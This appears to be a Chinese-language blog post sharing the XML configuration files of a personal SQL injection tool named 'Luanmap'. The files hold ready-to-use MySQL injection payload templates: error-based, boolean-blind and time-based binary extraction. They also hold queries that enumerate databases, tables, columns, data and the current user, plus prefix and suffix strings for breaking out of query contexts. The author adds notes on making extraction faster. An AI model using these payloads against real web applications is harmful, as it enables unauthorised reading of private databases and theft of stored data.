Mysql注入姿势-Luanmap 配置文件

作者: Luan 分类: 学习笔记 发布时间: 2017-06-23 02:14

Mysql.xml(MySQL的SQL语句):

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <sqli>
        <name>error_procedure</name>
        <content>procedure analyse(extractvalue(1,concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a)),1)</content>
    </sqli>
    <sqli>
        <name>error_extractvalue</name>
        <content>extractvalue(1,concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))</content>
    </sqli>
    <sqli>
        <name>error_updatexml</name>
        <content>updatexml(1,concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a),1)</content>
    </sqli>
    <sqli>
        <name>error_geometrycollection</name>
        <content>geometrycollection((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_multipoint</name>
        <content>multipoint((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_polygon</name>
        <content>polygon((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_multipolygon</name>
        <content>multipolygon((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_linestring</name>
        <content>linestring((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_multilinestring</name>
        <content>multilinestring((select * from(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a)b))</content>
    </sqli>
    <sqli>
        <name>error_exp</name>
        <content>exp(~(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))a))</content>
    </sqli>
    <sqli>
        <name>error_floor</name>
        <content>(SELECT 6 FROM(SELECT COUNT(*),CONCAT(0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</content>
    </sqli>
    <sqli>
        <name>error_bigint</name>
        <content>!(select * from(select concat (0x3a6c75616e3a,($$$[sql]$$$),0x3a6c75616e3a))x)-~0</content>
    </sqli>
    <sqli>
        <name>blind_normal</name>
        <content>(ord(mid(($$$[sql]$$$)from($$$[sub_index]$$$)for(1)))between($$$[char]$$$)and(998))</content>
    </sqli>
    <sqli>
        <name>time_test_bin</name>
        <content>(select(8)from(select(sleep((($$$[bool_a]$$$)in($$$[bool_b]$$$))*2)))a)</content>
    </sqli>
    <sqli>
        <name>time_bin</name>
        <content>(select(8)from(select(sleep((mid(bin(ord(mid(($$$[sql]$$$)from($$$[sub_index]$$$)for(1))))from(-$$$[bin_sub_index]$$$)for(1))in(1))*$$$[time_sec]$$$)))a)</content>
    </sqli>
    <sql>
        <name>get_database_count</name>
        <content>SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA</content>
    </sql>
    <sql>
        <name>get_database_name</name>
        <content>SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT $$$[index]$$$,1</content>
    </sql>
    <sql>
        <name>get_table_count</name>
        <content>SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN ($$$[db_name]$$$)</content>
    </sql>
    <sql>
        <name>get_table_name</name>
        <content>SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN ($$$[db_name]$$$) LIMIT $$$[index]$$$,1</content>
    </sql>
    <sql>
        <name>get_column_count</name>
        <content>SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=$$$[db_name]$$$ AND table_name=$$$[table_name]$$$</content>
    </sql>
    <sql>
        <name>get_column_name</name>
        <content>SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=$$$[db_name]$$$ AND table_name=$$$[table_name]$$$ LIMIT $$$[index]$$$,1</content>
    </sql>
    <sql>
        <name>get_data_count</name>
        <content>SELECT COUNT(*) FROM $$$[db_name]$$$.$$$[table_name]$$$</content>
    </sql>
    <sql>
        <name>get_data_name</name>
        <content>SELECT $$$[column_name]$$$ FROM $$$[db_name]$$$.$$$[table_name]$$$ ORDER BY $$$[order_by]$$$ LIMIT $$$[index]$$$,1</content>
    </sql>
    <sql>
        <name>test_injectable</name>
        <content>SELECT 0x6f6b</content>
    </sql>
    <sql>
        <name>get_current_user</name>
        <content>SELECT CURRENT_USER</content>
    </sql>
    <sql>
        <name>get_current_user_2</name>
        <content>SELECT USER( )</content>
    </sql>
    <sql>
        <name>get_current_database</name>
        <content>SELECT DATABASE( )</content>
    </sql>
    <sql>
        <name>get_current_database2</name>
        <content>schema()</content>
    </sql>
    <sql>
        <name>get_version</name>
        <content>SELECT @@VERSION</content>
    </sql>
    <sql>
        <name>get_version_2</name>
        <content>SELECT VERSION()</content>
    </sql>
</root>

都是比较常规的SQL语句,听了开发大牛建议,我决定还是先多学学数据库再去写工具。。
这些语句都是网上收集的,还有一些没有加进luanmap里面,比如Mysql5.6后多了两个记录数据库信息的表:https://www.exploit-db.com/docs/41274.pdf
这个xml里面比较新加进去的就是time_bin了,把注入结果二进制编码,然后只需要7次请求就可以确定一个字符了。这个是一个15年的文章里面看到的思路。别的数据库也是可以的。这个方法相对于二分法优势就是可以并发,速度贼快的。

payload.xml(闭合语句使用)

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <sqli>
        <prefix>'^</prefix>
        <suffix>^'</suffix>
    </sqli>
    <sqli>
        <prefix>^</prefix>
        <suffix></suffix>
    </sqli>
    <sqli>
        <prefix>'mod </prefix>
        <suffix> mod'</suffix>
    </sqli>
    <sqli>
        <prefix>-</prefix>
        <suffix>---</suffix>
    </sqli>
    <sqli>
        <prefix>'regexp(</prefix>
        <suffix>)#</suffix>
    </sqli>
    <sqli>
        <prefix>regexp(</prefix>
        <suffix>)</suffix>
    </sqli>
</root>

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论